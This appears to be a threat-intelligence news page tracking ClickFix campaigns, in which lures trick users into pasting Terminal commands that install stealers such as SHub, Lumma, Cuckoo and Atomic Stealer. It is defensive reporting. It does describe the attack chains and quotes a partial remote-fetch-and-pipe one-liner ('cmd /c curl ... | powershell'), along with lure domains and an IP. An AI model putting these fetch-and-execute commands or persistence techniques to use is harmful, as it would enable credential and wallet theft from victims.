ClickFix Social Engineering Campaigns Using Terminal Commands to Install Stealers
Multiple reports highlighted ClickFix-style social engineering that convinces users to paste attacker-supplied commands into a terminal, leading to infostealer installation. Malwarebytes documented a macOS lure impersonating CleanMyMac via cleanmymacos[.]org, where victims are instructed to run a Terminal command that prints a reassuring message, decodes a hidden (base64) destination, and then downloads and executes a remote shell script via zsh. The resulting payload installs SHub Stealer, which targets saved passwords, browser data, Apple Keychain contents, Telegram sessions, and cryptocurrency wallets; it can also tamper with wallet applications (e.g., Exodus, Atomic Wallet, Ledger Live) to enable later theft of recovery phrases.
Microsoft threat intelligence (as reported by The Hacker News) described a parallel Windows ClickFix campaign that shifts from the traditional Run-dialog paste to Windows Terminal (wt.exe) using the Win + X → I shortcut, exploiting the tool’s administrative legitimacy to reduce suspicion and evade detections tuned to Run-dialog abuse. In that chain, users paste a hex-encoded/XOR-compressed command that spawns additional Terminal/PowerShell stages to decode scripts, download a ZIP payload plus a legitimate-but-renamed 7-Zip binary, extract additional components, establish persistence via scheduled tasks, configure Microsoft Defender exclusions, and ultimately deploy Lumma Stealer (including use of QueueUserAPC() for injection).
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
6 events from the most recent confirmed update back to the earliest known activity.
Moonlock reports recruiter-themed ClickFix targeting VC and fintech talent
By March 31, 2026, Moonlock Lab documented a ClickFix campaign targeting crypto, Web3, blockchain, VC, and fintech professionals through fake LinkedIn recruiter personas, Calendly links, and spoofed Zoom or Google Meet pages. The campaign used fake verification prompts to copy OS-specific Terminal commands that launched multi-stage payloads stealing credentials and crypto wallet data, with tradecraft overlaps noted with DPRK-linked UNC1069 and Contagious Interview activity.
SHub Stealer campaign adds wallet backdooring and LaunchAgent persistence
Analysis of the macOS campaign showed SHub stealing Keychain, browser, iCloud, Notes, Telegram, and wallet data, backdooring Electron-based cryptocurrency wallet apps to capture seed phrases and passwords, and persisting via a LaunchAgent masquerading as Google Keystone.
Researchers identify fake CleanMyMac site delivering SHub Stealer on macOS
By March 6, 2026, researchers reported that the fake site cleanmymacos[.]org was impersonating CleanMyMac and using a ClickFix-style Terminal command to install SHub Stealer on macOS systems.
Microsoft publicly discloses Terminal-based ClickFix and Lumma details
On March 6, 2026, Microsoft publicly revealed the Windows Terminal-focused ClickFix campaign, including a second infection path involving batch/VBS/MSBuild execution and possible EtherHiding through blockchain RPC endpoints, along with defensive guidance.
ClickFix campaign deploys Lumma Stealer via multi-stage Windows chain
In the observed February campaign, pasted Terminal commands decoded and launched multi-stage payloads that downloaded archives and tools, established persistence with scheduled tasks, altered Microsoft Defender exclusions, and ultimately deployed Lumma Stealer to steal browser credentials from Chrome and Edge.
Microsoft observes Windows Terminal ClickFix campaign in February 2026
Microsoft Threat Intelligence observed a widespread ClickFix social-engineering campaign in February 2026 that shifted from the Windows Run dialog to Windows Terminal, using fake CAPTCHA, verification, and troubleshooting lures to trick users into pasting malicious commands.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
8 references tracked. Mallory keeps watching after this page renders.
ClickFix Attacks Are Targeting VC and Fintech Talent with New Multi-Stage Loader Techniques | HackerNoon
hackernoon.com
Open sourceLumma Stealer-spreading ClickFix attack uncovered | brief | SC Media
scworld.com
Open sourceFake CleanMyMac Site Uses ClickFix Trick to Install SHub Stealer on macOS
hackread.com
Open sourceNew ClickFix Attack leverages Windows Terminal for Payload Execution - Cyber Security News
cybersecuritynews.com
Open sourceMicrosoft warns of ClickFix campaign exploiting Windows Terminal for Lumma Stealer
securityaffairs.com
Open sourceFake CleanMyMac site installs SHub Stealer and backdoors crypto wallets | Malwarebytes
malwarebytes.com
Open sourceMicrosoft Reveals ClickFix Campaign Using Windows Terminal to Deploy Lumma Stealer
thehackernews.com
Open sourceMicrosoft spots ClickFix scam spreading Lumma infostealer • The Register
go.theregister.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
ClickFix Social Engineering Drives Multi-Platform Malware Delivery
Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.
Mar 21, 2026
ClickFix Social-Engineering Campaigns Using Fake CAPTCHA and Fake Installer Pages
Security researchers reported multiple **ClickFix** campaigns that compromise endpoints by tricking users into manually executing attacker-provided commands rather than exploiting a software vulnerability. CERT Polska documented an incident response at a large Polish organization where a **fake CAPTCHA** prompt led a user to run a malicious snippet via *Win+R*, resulting in malware execution and suspected **DLL side-loading** from `%APPDATA%\Intel` (legitimate `igfxSDK.exe`/`version.dll` alongside a suspicious `wtsapi32.dll`). Investigators also identified additional suspicious DLLs in the user’s local AppData and recovered an execution trail consistent with a one-liner that fetched remote content and piped it into PowerShell (e.g., `cmd /c curl ... | powershell`). Separately, threat hunting research described a macOS-focused ClickFix operation using **typosquatted Homebrew** lookalike sites to present a “copy/paste” install command that runs in Terminal. The first-stage script repeatedly prompted for a password and validated it using `dscl authonly` to harvest working credentials before deploying a second-stage infostealer dubbed **Cuckoo Stealer**, which was reported to establish **LaunchAgent** persistence, remove quarantine attributes, and communicate over encrypted HTTPS C2 while targeting browser credentials/session tokens, Keychain data, notes/messaging artifacts, VPN/FTP configs, and cryptocurrency wallets. Both reports highlight ClickFix as an increasingly common, opportunistic initial access technique that scales by abusing trusted user workflows on Windows and macOS.
Mar 21, 2026
ClickFix macOS Campaign Abuses Script Editor to Deploy Atomic Stealer
Researchers identified a **ClickFix-style** campaign targeting macOS users that swaps Terminal-based execution for **Script Editor** to bypass newer Apple protections. Victims are lured to fake Apple-themed pages such as “Reclaim disk space on your Mac,” which invoke the `applescript://` URL scheme and open Script Editor with a pre-filled AppleScript. If the user runs it, the script conceals a malicious shell command that decodes a URL, uses `curl` with TLS certificate validation disabled, and pipes the response directly into `zsh` for in-memory execution. The activity, discovered by **Jamf Threat Labs**, ultimately downloads and launches a Mach-O variant of **Atomic Stealer**, an infostealer built to harvest browser credentials, saved passwords, cryptocurrency wallets, and other sensitive data from macOS systems. Researchers said the campaign appears to be an adaptation to Apple’s paste-command scanning protections added in macOS 26.4 for Terminal abuse; while newer macOS versions also warn about unidentified scripts, the attack can still succeed if users follow the prompts. Reported infrastructure tied to the campaign includes `dryvecar.com`, `storage-fixes.squarespace.com`, and `cleanupmac.mssg.me`.
May 25, 2026